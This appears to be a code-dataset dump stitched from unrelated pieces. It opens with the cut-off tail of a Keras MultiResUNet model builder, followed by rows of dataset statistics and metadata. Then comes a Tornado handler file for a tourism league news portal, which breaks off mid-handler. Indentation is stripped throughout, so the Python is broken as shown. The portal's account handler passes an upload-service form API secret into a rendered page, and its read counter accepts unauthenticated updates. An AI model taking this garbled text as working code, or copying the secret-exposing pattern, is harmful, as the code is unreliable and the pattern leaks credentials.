print("ERROR: Please Check the Values of the Input Parameters!")
mresblocks = {}
levels = []
i = 1
# Encoding
inputs = tf.keras.Input((self.length, self.width, self.num_channel))
mresblock = MultiResBlock(inputs, self.model_width, self.kernel_size, 2 ** 0, self.alpha)
pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(mresblock)
mresblocks["mres%s" % i] = ResPath(mresblock, self.model_depth, self.model_width, self.kernel_size, 2 ** 0)
for i in range(2, (self.model_depth + 1)):
mresblock = MultiResBlock(pool, self.model_width, self.kernel_size, 2 ** (i - 1), self.alpha)
pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(mresblock)
mresblocks["mres%s" % i] = ResPath(mresblock, (self.model_depth- i + 1), self.model_width, self.kernel_size, 2 ** (i - 1))
# Collect Latent Features or Embeddings from AutoEncoders
if (self.A_E == 0) and (self.D_S == 0):
mresblock = MultiResBlock(pool, self.model_width, self.kernel_size, 2 ** self.model_depth, self.alpha)
elif (self.A_E == 0) and (self.D_S == 1):
mresblock = MultiResBlock(pool, self.model_width, self.kernel_size, 2 ** self.model_depth, self.alpha)
level = tf.keras.layers.Conv2D(1, (1,1), name=f'level{self.model_depth}')(mresblock)
levels.append(level)
elif (self.A_E == 1) and (self.D_S == 0):
latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
mresblock = MultiResBlock(latent, self.model_width, self.kernel_size, 2 ** self.model_depth, self.alpha)
elif (self.A_E == 1) and (self.D_S == 1):
latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
mresblock = MultiResBlock(latent, self.model_width, self.kernel_size, 2 ** self.model_depth, self.alpha)
level = tf.keras.layers.Conv2D(1, (1,1), name=f'level{self.model_depth}')(mresblock)
levels.append(level)
else:
print("ERROR: Please Check the Values of the Input Parameters!")
# Decoding
mresblocks_list = list(mresblocks.values())
deconv = MultiResBlock(Concat_Block(upConv_Block(mresblock), mresblocks_list[self.model_depth - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - 1), self.alpha)
for j in range(1, self.model_depth):
if self.D_S == 0:
deconv = MultiResBlock(Concat_Block(upConv_Block(deconv), mresblocks_list[self.model_depth - j - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1), self.alpha)
elif self.D_S == 1:
level = tf.keras.layers.Conv2D(1, (1,1), name=f'level{self.model_depth - j}')(deconv)
levels.append(level)
deconv = MultiResBlock(Concat_Block(upConv_Block(deconv), mresblocks_list[self.model_depth - j - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1), self.alpha)
else:
print("ERROR: Please Check the Values of the Input Parameters!")
# Output
outputs = []
if self.problem_type == 'Classification':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
elif self.problem_type == 'Regression':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
if self.D_S == 1:
levels.append(outputs)
levels.reverse()
model = tf.keras.Model(inputs=[inputs], outputs=levels)
return model
def MultiResUNet_v2(self):
''' 1D MultiResUNet with an option for Deep Supervision and/or being used as an AutoEncoder - Version 2'''
if self.length == 0 or self.model_depth == 0 or self.model_width == 0 or self.num_channel == 0 or self.kernel_size == 0:
print("ERROR: Please Check the Values of the Input Parameters!")
mresblocks = {}
levels = []
i = 1
# Encoding
inputs = tf.keras.Input((self.length, self.width, self.num_channel))
mresblock = MultiResBlock(inputs, self.model_width, self.kernel_size, 2 ** 0, self.alpha)
pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(mresblock)
mresblocks["mres%s" % i] = ResPath(mresblock, self.model_depth, self.model_width, self.kernel_size, 2 ** 0)
for i in range(2, (self.model_depth + 1)):
mresblock = MultiResBlock(pool, self.model_width, self.kernel_size, 2 ** (i - 1), self.alpha)
pool = tf.keras.layers.MaxPooling2D(pool_size=(2,2))(mresblock)
mresblocks["mres%s" % i] = ResPath(mresblock, (self.model_depth- i + 1), self.model_width, self.kernel_size, 2 ** (i - 1))
# Collect Latent Features or Embeddings from AutoEncoders
if (self.A_E == 0) and (self.D_S == 0):
mresblock = MultiResBlock(pool, self.model_width, self.kernel_size, 2 ** self.model_depth, self.alpha)
elif (self.A_E == 0) and (self.D_S == 1):
mresblock = MultiResBlock(pool, self.model_width, self.kernel_size, 2 ** self.model_depth, self.alpha)
level = tf.keras.layers.Conv2D(1, (1,1), name=f'level{self.model_depth}')(mresblock)
levels.append(level)
elif (self.A_E == 1) and (self.D_S == 0):
latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
mresblock = MultiResBlock(latent, self.model_width, self.kernel_size, 2 ** self.model_depth, self.alpha)
elif (self.A_E == 1) and (self.D_S == 1):
latent = Feature_Extraction_Block(pool, self.model_width, int(self.length / (2 ** self.model_depth)), self.feature_number)
mresblock = MultiResBlock(latent, self.model_width, self.kernel_size, 2 ** self.model_depth, self.alpha)
level = tf.keras.layers.Conv2D(1, (1,1), name=f'level{self.model_depth}')(mresblock)
levels.append(level)
else:
print("ERROR: Please Check the Values of the Input Parameters!")
# Decoding
mresblocks_list = list(mresblocks.values())
deconv = MultiResBlock(Concat_Block(trans_conv2D(mresblock, self.model_width, 2 ** (self.model_depth - 1)), mresblocks_list[self.model_depth - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - 1), self.alpha)
for j in range(1, self.model_depth):
if self.D_S == 0:
deconv = MultiResBlock(Concat_Block(trans_conv2D(deconv, self.model_width, 2 ** (self.model_depth - j - 1)), mresblocks_list[self.model_depth - j - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1), self.alpha)
elif self.D_S == 1:
level = tf.keras.layers.Conv2D(1, (1,1), name=f'level{self.model_depth - j}')(deconv)
levels.append(level)
deconv = MultiResBlock(Concat_Block(trans_conv2D(deconv, self.model_width, 2 ** (self.model_depth - j - 1)), mresblocks_list[self.model_depth - j - 1]), self.model_width, self.kernel_size, 2 ** (self.model_depth - j - 1), self.alpha)
else:
print("ERROR: Please Check the Values of the Input Parameters!")
# Output
outputs = []
if self.problem_type == 'Classification':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='softmax', name="out")(deconv)
elif self.problem_type == 'Regression':
outputs = tf.keras.layers.Conv2D(self.output_nums, (1, 1), activation='linear', name="out")(deconv)
model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
if self.D_S == 1:
levels.append(outputs)
levels.reverse()
model = tf.keras.Model(inputs=[inputs], outputs=levels)
return model
| 55.103104
| 250
| 0.589119
| 6,706
| 49,703
| 4.213093
| 0.033105
| 0.117545
| 0.092663
| 0.101228
| 0.919301
| 0.912469
| 0.903904
| 0.899586
| 0.89548
| 0.893003
| 0
| 0.023618
| 0.276764
| 49,703
| 901
| 251
| 55.164262
| 0.762345
| 0.051486
| 0
| 0.889543
| 0
| 0
| 0.069727
| 0.01177
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02651
| false
| 0
| 0.001473
| 0
| 0.054492
| 0.035346
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fd55dbfb5d52856551cb41a03f1bb3ea8af9663
| 52,676
|
py
|
Python
|
foo/portal/newsup.py
|
ThomasZh/legend-league-portal
|
df06ac05ea506c3e257517716b6d692b69c8bf6b
|
[
"Apache-2.0"
] | null | null | null |
foo/portal/newsup.py
|
ThomasZh/legend-league-portal
|
df06ac05ea506c3e257517716b6d692b69c8bf6b
|
[
"Apache-2.0"
] | null | null | null |
foo/portal/newsup.py
|
ThomasZh/legend-league-portal
|
df06ac05ea506c3e257517716b6d692b69c8bf6b
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# _*_ coding: utf-8_*_
#
# Copyright 2016 planc2c.com
# thomas@time2box.com
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import tornado.web
import logging
import time
import sys
import os
import uuid
import smtplib
import json as JSON # 启用别名,不会跟方法里的局部变量混淆
from bson import json_util
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "../"))
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "../dao"))
from tornado.escape import json_encode, json_decode
from tornado.httpclient import *
from tornado.httputil import url_concat
from bson import json_util
from comm import *
from global_const import *
class WxMpVerifyHandler(tornado.web.RequestHandler):
def get(self):
self.finish('qdkkOWgyqqLTrijx')
return
class NewsupLoginNextHandler(tornado.web.RequestHandler):
def get(self):
login_next = self.get_secure_cookie("login_next")
logging.info("got login_next %r",login_next)
if login_next:
self.redirect(login_next)
else:
self.redirect("/portal/newsup/index")
class NewsupIndexHandler(BaseHandler):
def get(self):
logging.info(self.request)
# league(联盟信息)
league_info = self.get_league_info()
# franchises(景区)
params = {"filter":"league", "franchise_type":"景区", "page":1, "limit":5}
url = url_concat(API_DOMAIN+"/api/leagues/"+LEAGUE_ID+"/clubs", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
rs = data['rs']
franchises = rs['data']
for franchise in franchises:
franchise['create_time'] = timestamp_friendly_date(franchise['create_time'])
# suppliers(供应商)
params = {"filter":"league", "franchise_type":"供应商", "page":1, "limit":5}
url = url_concat(API_DOMAIN+"/api/leagues/"+LEAGUE_ID+"/clubs", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
rs = data['rs']
suppliers = rs['data']
for supplier in suppliers:
supplier['create_time'] = timestamp_friendly_date(supplier['create_time'])
# sceneries(景点)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"41c057a6f73411e69a3c00163e023e51", "idx":0, "limit":5}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
sceneries = data['rs']
for article in sceneries:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# journey(游记)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"01d6120cf73411e69a3c00163e023e51", "idx":0, "limit":12}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
journeies = data['rs']
for article in journeies:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# activity(活动)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"0bbf89e2f73411e69a3c00163e023e51", "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
activities = data['rs']
# recently articles(最新文章news)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
news = data['rs']
for article in news:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# popular(流行)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"3801d62cf73411e69a3c00163e023e51", "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
populars = data['rs']
for article in populars:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# hot(热点新闻)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"1b86ad38f73411e69a3c00163e023e51", "idx":0, "limit":12}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
hots = data['rs']
for article in hots:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# lastest comments(最新的评论)
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":5}
url = url_concat(API_DOMAIN+"/api/last-comments", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
lastest_comments = data['rs']
for comment in lastest_comments:
comment['create_time'] = timestamp_friendly_date(comment['create_time'])
# multimedia
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":8}
url = url_concat(API_DOMAIN+"/api/multimedias", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
multimedias = data['rs']
for multimedia in multimedias:
multimedia['publish_time'] = timestamp_friendly_date(multimedia['publish_time'])
# notices
params = {"filter":"league", "league_id":LEAGUE_ID, "page":1, "limit":3}
url = url_concat(API_DOMAIN+"/api/notice-board", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
notices = data['rs']
is_login = False
access_token = self.get_secure_cookie("access_token")
logging.info("got access_token>>>>> %r",access_token)
if access_token:
is_login = True
self.render('newsup/index.html',
is_login=is_login,
franchises=franchises,
suppliers=suppliers,
sceneries=sceneries,
journeies=journeies,
news=news,
populars=populars,
hots=hots,
league_info=league_info,
activities=activities,
lastest_comments=lastest_comments,
multimedias=multimedias,
api_domain=API_DOMAIN,
notices=notices['data'])
class NewsupAccountHandler(AuthorizationHandler):
@tornado.web.authenticated # if no session, redirect to login page
def get(self):
logging.info(self.request)
is_login = False
access_token = self.get_secure_cookie("access_token")
if access_token:
is_login = True
# league(联盟信息)
league_info = self.get_league_info()
headers = {"Authorization":"Bearer "+access_token}
url = API_DOMAIN+"/api/myinfo?filter=login"
http_client = HTTPClient()
response = http_client.fetch(url, method="GET", headers=headers)
logging.info("got response %r", response.body)
data = json_decode(response.body)
user = data['rs']
self.render('newsup/account.html',
is_login=is_login,
league_info=league_info,
user = user,
access_token=access_token,
api_domain=API_DOMAIN,
upyun_domain=UPYUN_DOMAIN,
upyun_notify_url=UPYUN_NOTIFY_URL,
upyun_form_api_secret=UPYUN_FORM_API_SECRET,
upyun_bucket=UPYUN_BUCKET)
class NewsupAuthorHandler(BaseHandler):
def get(self):
logging.info(self.request)
is_login = False
access_token = self.get_secure_cookie("access_token")
if access_token:
is_login = True
# league(联盟信息)
league_info = self.get_league_info()
# news(新闻)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"30a56cb8f73411e69a3c00163e023e51", "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
news = data['rs']
for article in news:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# popular(流行)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"3801d62cf73411e69a3c00163e023e51", "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
populars = data['rs']
for article in populars:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# activity(活动)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"0bbf89e2f73411e69a3c00163e023e51", "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
activities = data['rs']
# lastest comments(最新的评论)
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":5}
url = url_concat(API_DOMAIN+"/api/last-comments", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
lastest_comments = data['rs']
for comment in lastest_comments:
comment['create_time'] = timestamp_friendly_date(comment['create_time'])
self.render('newsup/author.html',
is_login=is_login,
league_info=league_info,
news=news,
populars=populars,
activities=activities,
api_domain=API_DOMAIN,
lastest_comments=lastest_comments)
class NewsupMediaHandler(BaseHandler):
def get(self):
logging.info(self.request)
# league(联盟信息)
league_info = self.get_league_info()
# multimedia
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":14}
url = url_concat(API_DOMAIN+"/api/multimedias", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
multimedias = data['rs']
# news(新闻)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"30a56cb8f73411e69a3c00163e023e51", "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
news = data['rs']
for article in news:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# hot(热点新闻)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"1b86ad38f73411e69a3c00163e023e51", "idx":0, "limit":12}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
hots = data['rs']
for article in hots:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# popular(流行)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"3801d62cf73411e69a3c00163e023e51", "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
populars = data['rs']
for article in populars:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# activity(活动)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"0bbf89e2f73411e69a3c00163e023e51", "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
activities = data['rs']
# lastest comments(最新的评论)
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":5}
url = url_concat(API_DOMAIN+"/api/last-comments", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
lastest_comments = data['rs']
for comment in lastest_comments:
comment['create_time'] = timestamp_friendly_date(comment['create_time'])
is_login = False
access_token = self.get_secure_cookie("access_token")
if access_token:
is_login = True
self.render('newsup/media.html',
is_login=is_login,
league_info=league_info,
news=news,
populars=populars,
activities=activities,
hots=hots,
lastest_comments=lastest_comments,
league_id=LEAGUE_ID,
api_domain=API_DOMAIN,
multimedias=multimedias)
class NewsupShortcodesHandler(BaseHandler):
def get(self):
logging.info(self.request)
# league(联盟信息)
league_info = self.get_league_info()
# news(新闻)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"30a56cb8f73411e69a3c00163e023e51", "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
news = data['rs']
for article in news:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# popular(流行)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"3801d62cf73411e69a3c00163e023e51", "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
populars = data['rs']
for article in populars:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# activity(活动)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"0bbf89e2f73411e69a3c00163e023e51", "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
activities = data['rs']
is_login = False
access_token = self.get_secure_cookie("access_token")
if access_token:
is_login = True
self.render('newsup/shortcodes.html',
is_login=is_login,
league_info=league_info,
news=news,
activities=activities,
api_domain=API_DOMAIN,
populars=populars)
class NewsupContactHandler(BaseHandler):
def get(self):
logging.info(self.request)
# league(联盟信息)
league_info = self.get_league_info()
# lastest comments(最新的评论)
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":5}
url = url_concat(API_DOMAIN+"/api/last-comments", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
lastest_comments = data['rs']
for comment in lastest_comments:
comment['create_time'] = timestamp_friendly_date(comment['create_time'])
is_login = False
access_token = self.get_secure_cookie("access_token")
if access_token:
is_login = True
self.render('newsup/contact.html',
is_login=is_login,
league_info=league_info,
lastest_comments=lastest_comments,
api_domain=API_DOMAIN,
league_id=LEAGUE_ID)
class NewsupItemDetailHandler(BaseHandler):
def get(self):
logging.info(self.request)
article_id = self.get_argument("id", "")
# league(联盟信息)
league_info = self.get_league_info()
# recently articles(最新文章news)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
news = data['rs']
for article in news:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# popular(流行)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"3801d62cf73411e69a3c00163e023e51", "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
populars = data['rs']
for article in populars:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# activity(活动)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"0bbf89e2f73411e69a3c00163e023e51", "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
activities = data['rs']
# article
url = API_DOMAIN+"/api/articles/"+article_id
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got article response %r", response.body)
data = json_decode(response.body)
article_info = data['rs']
article_info['publish_time'] = timestamp_friendly_date(article_info['publish_time'])
# hot(热点新闻)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"1b86ad38f73411e69a3c00163e023e51", "idx":0, "limit":12}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
hots = data['rs']
for article in hots:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# update read_num
read_num = article_info['read_num']
url = API_DOMAIN+"/api/articles/"+article_id+"/read"
http_client = HTTPClient()
_body = {"read_num": read_num+1}
_json = json_encode(_body)
response = http_client.fetch(url, method="POST", body=_json)
logging.info("got update read_num response %r", response.body)
# lastest comments(最新的评论)
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":5}
url = url_concat(API_DOMAIN+"/api/last-comments", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
lastest_comments = data['rs']
for comment in lastest_comments:
comment['create_time'] = timestamp_friendly_date(comment['create_time'])
# multimedia
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/multimedias", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
multimedias = data['rs']
is_login = False
access_token = self.get_secure_cookie("access_token")
if access_token:
is_login = True
self.render('newsup/item-detail.html',
is_login=is_login,
access_token=access_token,
league_info=league_info,
article_info=article_info,
news=news,
populars=populars,
hots=hots,
activities=activities,
api_domain=API_DOMAIN,
multimedias=multimedias,
lastest_comments=lastest_comments)
class NewsupNewHandler(BaseHandler):
def get(self):
logging.info(self.request)
# league(联盟信息)
league_info = self.get_league_info()
is_login = False
access_token = self.get_secure_cookie("access_token")
if access_token:
is_login = True
self.render('newsup/new.html',
league_info=league_info,
api_domain=API_DOMAIN,
is_login=is_login)
class NewsupCategoryTileHandler(BaseHandler):
def get(self):
logging.info(self.request)
# league(联盟信息)
league_info = self.get_league_info()
# recently articles(最新文章news)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
news = data['rs']
for article in news:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# popular(流行)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"3801d62cf73411e69a3c00163e023e51", "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
populars = data['rs']
for article in populars:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# activity(活动)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"0bbf89e2f73411e69a3c00163e023e51", "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
activities = data['rs']
# lastest comments(最新的评论)
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":5}
url = url_concat(API_DOMAIN+"/api/last-comments", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
lastest_comments = data['rs']
for comment in lastest_comments:
comment['create_time'] = timestamp_friendly_date(comment['create_time'])
is_login = False
access_token = self.get_secure_cookie("access_token")
if access_token:
is_login = True
self.render('newsup/category-tile.html',
is_login=is_login,
league_info=league_info,
lastest_comments=lastest_comments,
news=news,
activities=activities,
api_domain=API_DOMAIN,
populars=populars)
class NewsupCategoryHandler(BaseHandler):
def get(self):
logging.info(self.request)
category_id = self.get_argument("id", "")
# league(联盟信息)
league_info = self.get_league_info()
# query category_name by category_id
url = API_DOMAIN+"/api/categories/" + category_id
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
category = data['rs']
# query by category_id
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":category_id, "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
sceneries = data['rs']
for article in sceneries:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# multimedia
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/multimedias", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
multimedias = data['rs']
# recently articles(最新文章news)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
news = data['rs']
for article in news:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# popular(流行)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"3801d62cf73411e69a3c00163e023e51", "idx":0, "limit":6}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
populars = data['rs']
for article in populars:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# activity(活动)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"0bbf89e2f73411e69a3c00163e023e51", "idx":0, "limit":4}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
activities = data['rs']
# hot(热点新闻)
params = {"filter":"league", "league_id":LEAGUE_ID, "status":"publish", "category":"1b86ad38f73411e69a3c00163e023e51", "idx":0, "limit":12}
url = url_concat(API_DOMAIN+"/api/articles", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
hots = data['rs']
for article in hots:
article['publish_time'] = timestamp_friendly_date(article['publish_time'])
# lastest comments(最新的评论)
params = {"filter":"league", "league_id":LEAGUE_ID, "idx":0, "limit":5}
url = url_concat(API_DOMAIN+"/api/last-comments", params)
http_client = HTTPClient()
response = http_client.fetch(url, method="GET")
logging.info("got response %r", response.body)
data = json_decode(response.body)
lastest_comments = data['rs']
for comment in lastest_comments:
comment['create_time'] = timestamp_friendly_date(comment['create_time'])
is_login = False
